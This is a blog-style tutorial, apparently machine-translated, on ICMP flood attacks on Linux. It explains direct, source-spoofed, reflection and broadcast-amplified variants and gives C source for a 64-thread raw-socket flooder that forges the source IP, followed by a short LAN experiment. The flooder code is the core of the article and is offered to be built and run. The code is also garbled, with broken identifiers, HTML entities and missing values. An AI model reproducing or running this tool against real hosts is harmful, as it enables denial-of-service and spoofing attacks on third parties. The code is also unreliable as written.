ICMP flood attacks on Linux programming

My previous article "Linux Programming Ping Implementation" in the use of the ICMP protocol to implement the Ping program, ICMP in addition to the implementation of such a ping program, what is not known or fun to use? Here I will introduce another very famous black technology for ICMP: ICMP flood attack. The ICMP flood attack is one of the most famous DOS (denial of Service) attacks, one that hackers like to attack, and the purpose of deepening their understanding of ICMP, and also trying to write an ICMP flood attack applet based on ICMP. Flood attack (FLOOD ATTACK) refers to the use of computer network technology to the destination host to send a large number of useless data packets, so that the destination host busy processing useless data messages and unable to provide normal service network behavior. ICMP flood attack: As the name implies, is to send flood-like ping packets to the destination host, making the destination host busy with the ping packet and no ability to handle other normal requests, it is like a flood ping packet to the purpose of flooding the host. To achieve an ICMP flood attack, the following three knowledge reserves are required:

• Dos Attack principle
• Deep understanding of ICMP
• Programming Tips for RAW sockets
  
  

first, the principle of ICMP flood attackICMP flood attack is formed on the basis of ping, but the ping program can rarely cause the purpose and the problem of downtime, this is because the speed of the ping send packet is too slow, like the ping program I implemented ping packet sent rate limited to 1 seconds, 1 rounds, This rate is more than sufficient for the host to handle ping packets. Therefore, in order to create a "flood" phenomenon, it is necessary to increase the rate of packets. Here are the three types of ICMP flood attacks: (1) Direct flood attacks need to compete between the bandwidth of the local host and the bandwidth of the destination host, such as my host network bandwidth is 30M, and your host network bandwidth is only 3M, then I launch flood attack flooding your host success rate is very large. This attack mode requires the attack host to handle more power and bandwidth than the attacked host, otherwise it is DOS. Based on this idea, we can use a high-bandwidth and high-performance computer, multi-threaded method to send multiple ICMP request packets at once, so that the destination host busy processing a large number of these messages caused by slow or even downtime. This method has a big drawback, is that the other side can be based on the ICMP packet IP address and block out the attack source, so that the attack can not continue. (2) Pseudo-IP attacks on the basis of direct flood attacks, we will send the IP address disguised as other IP, if it is disguised as a random IP, it can be very good to hide their location, if their own IP disguised as the IP of other victims, will cause "discord" situation, Host 1 of the ICMP reply packet also as flooding to the victim host 2, if the host 1 of the administrator to find out which bastard contracted to attack himself, he looked at the source address of the ICMP packet, Yi is the host 2, this looks like the host 2 has become the Lamb of sin. (3) Reflection attacks such attacks are different from the above two types of attacks, the design of reflective attacks more ingenious. In fact, the way three of the attack mode is the first two models of the combined version and the upgrade version, mode three attack strategy is a bit like "diehard", the reflection attack no longer directly to the target host, but instead of the other group of hosts mistakenly to send them the ICMP request packet, Then a group of hosts sends an ICMP response packet to the destination host, causing flooding from all directions to overwhelm the destination host. For example, we send an ICMP request packet to other hosts on the LAN, then our IP address is disguised as the IP of the destination host, so that the host of the subdirectory becomes the focus of the ICMP echo. This kind of attack is very covert, because the victim host is very difficult to find out who the attack source is. ii. design of ICMP flood attackHere I would like to implement an example of an ICMP flood attack, where I would like to use the method and design. Although the way three "diehard" more ingenious, in fact, is also by the way two camouflage way further extended, the realization is similar. First, the model diagram of the attack is given: 1. Group ICMP packetsThe package here is not much different from the group package when you write the ping program, the only thing to note is that we need to fill in the IP header section, because we want to disguise the source address and do jiahuoyuren.

voidDos_icmp_pack (Char*packet) {    structip* IP_HDR = (structip*) packet; structicmp* ICMP_HDR = (structicmp*) (Packet +sizeof(structIP)); IP_HDR->ip_v =4; IP_HDR-&GT;IP_HL =5; IP_HDR->ip_tos =0; IP_HDR->ip_len =htons (icmp_packet_size); IP_HDR->ip_id =htons (Getpid ()); IP_HDR->ip_off =0; IP_HDR->ip_ttl = -; IP_HDR->ip_p =proto_icmp; IP_HDR->ip_sum =0; IP_HDR-&GT;IP_SRC.S_ADDR = inet_addr (fake_ip);;//Camouflage Source AddressIP_HDR-&GT;IP_DST.S_ADDR = dest;//fill in the destination host address to attackICMP_HDR->icmp_type =Icmp_echo; ICMP_HDR->icmp_code =0; ICMP_HDR->icmp_cksum = htons (Icmp_echo <<8));//note here, because the data section is 0, we simplify the calculation of the checksum .}

2. Build a contract thread

voidDos_attack () {Char* Packet = (Char*)malloc(icmp_packet_size); memset (Packet,0, icmp_packet_size); structsockaddr_in to;    Dos_icmp_pack (packet); To.sin_family=af_inet; To.sin_addr.s_addr=dest; To.sin_port= Htons (0);  while(Alive)//control the global variables for the bundle{sendto (rawsock, packet, Icmp_packet_size,0, (structsockaddr*) &to,sizeof(structsockaddr)); }     Free(packet);//Remember to release the memory}

3. Write the contract switchThe switches here are simple and can be implemented with a semaphore + global variable. When we press CTRL + C, the attack shuts down.

void Dos_sig () {    0;    printf ("stop DoS attack!\n");}

4. The overall architectureWe used 64 threads to bundle the packets, of course, the number of threads can also be greatly increased to increase the attack strength. But we're just doing experiments, and there's no need to be that big.

intMainintargcChar*argv[]) {    structhostent* host =NULL; structprotoent* protocol =NULL; inti; Alive=1;  pthread_t Attack_thread[thread_max_num]; //Open 64 Threads simultaneous contract    intErr =0; if(ARGC <2) {printf ("Invalid input!\n"); return-1;    } signal (SIGINT, dos_sig); Protocol=Getprotobyname (proto_name); if(Protocol = =NULL) {printf ("Fail to getprotobyname!\n"); return-1; } proto_icmp= protocol->P_proto; Dest= Inet_addr (argv[1]); if(Dest = =Inaddr_none) {Host= gethostbyname (argv[1]); if(Host = =NULL) {printf ("Invalid IP or Domain name!\n"); return-1; } memcpy ((Char*) &dest, host->h_addr, host->h_length); } Rawsock=sockets (Af_inet, Sock_raw, proto_icmp); if(Rawsock <0) {printf ("Fait to create socket!\n"); return-1; } setsockopt (Rawsock, Sol_ip, Ip_hdrincl,"1",sizeof("1")); printf ("ICMP FLOOD ATTACK start\n");  for(i=0; i<thread_max_num;i++) {Err= Pthread_create (& (Attack_thread[i]), NULL, (void*) Dos_attack, NULL); if(Err) {printf ("Fail to create thread, err%d, thread ID:%d\n", err, attack_thread[i]); }    }     for(i=0; i<thread_max_num;i++) {pthread_join (attack_thread[i], NULL); //wait for thread to end} printf ("ICMP ATTACK finishi!\n");    Close (Rawsock); return 0;}

third, the experimentThe experiment in line with the purpose of learning, want to use their own equipment, want to further understand the network and protocol applications, so the range of attacks is smaller, time is a few seconds, not any device impact. Let's talk about our attack step: we use host 172.0.5.183 as our own attack host, and disguise ourselves as host 172.0.5.182, and launch an ICMP flood attack on the host 172.0.5.9. The attack begins with a look at the "victim" side of the situation. In just 5 seconds, the packets received and delivered to the upper layer are up to more than 70,000. I do not dare to do more to avoid affecting the machine work. Use Wireshark grab the bag and look at it, full of ICMP packets Ah, it seems that the volume is also very large. The source address of the ICMP packet is shown as 172.0.5.182 (our spoofed address), which also returns echo Reply to 172.0.5.182. Host 172.0.5.182 will certainly want to, inexplicably ah, how to receive so many echo reply bag.  The attack experiment was done. The more popular are DDoS attacks, which are more powerful, more sophisticated, and more difficult to defend. In fact, this DDoS attack is also initiated on the basis of DOS, the following steps: 1. The attacker broadcasts Echo request message 2 to the amplified network. The attacker specifies that the source IP of the broadcast message is the attacked host 3. "Amplified Network" reply Echo Reply to the attacked host 4. A DDoS attack scenario here, the "magnified network" can be understood as a network with many hosts, and the operating systems of those hosts need to support the response of some kind of ICMP request packet with the destination address as the broadcast address. Attack strategy is very subtle, in short, is to disguise the source address as the attack host IP, and then broadcast to all the host, the host received the Echo request after the collective to attack the host back to the packet, resulting in a accusation scenario.

ICMP flood attacks on Linux programming